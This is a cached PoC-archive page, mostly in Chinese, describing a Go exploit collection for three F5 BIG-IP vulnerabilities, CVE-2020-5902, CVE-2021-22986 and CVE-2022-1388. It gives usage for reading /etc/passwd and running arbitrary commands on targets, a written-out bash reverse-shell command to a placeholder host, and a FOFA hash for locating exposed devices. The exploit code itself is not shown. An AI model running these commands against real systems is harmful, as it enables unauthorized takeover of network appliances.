CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source

Associated Vulnerability

Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞，攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。

Description

CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合

Readme

# F5-BIG-IP POC

go语言编写CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合 后续会增加F5其他POC

author:160team.west9B

**仅限用于安全研究人员在授权的情况下使用，遵守网络安全法，产生任何问题，后果自负，与作者无关。**

# 01-基本介绍

F5 POC合集：

CVE-2020-5902：F5 BIG-IP远程代码执行漏洞

CVE-2021-22986：F5 BIG-IP iControl REST未授权远程命令执行漏洞

CVE-2022-1388：身份验证绕过远程命令执行



# 02-使用说明

## usage: ./F5-BIG-IP  -u url 

CVE-2020-5902验证使用任意文件下载，返回/etc/passwd 则漏洞存在

CVE-2021-22986，CVE-2022-1388 POC默认执行id命令，返回{id}则漏洞存在，可使用-c自定义命令

## 反弹shell

usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

# Screenshots
![Image text](https://github.com/west9b/F5-BIG-IP-POC/blob/main/poc.png)
![Image text](https://github.com/west9b/F5-BIG-IP-POC/blob/main/poc1.png)
# fofa
icon_hash="-335242539"

File Snapshot


 [4.0K]  /data/pocs/9bc37453ff32689972d635b688b1bb3dc026a1a7
├── [ 673]  CVE-2020-5902.go
├── [1.3K]  CVE-2021-22986.go
├── [1.3K]  CVE-2022-1388.go
├── [ 856]  F5.go
├── [ 22K]  poc1.png
├── [ 88K]  poc.png
└── [1.0K]  README.md

0 directories, 7 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!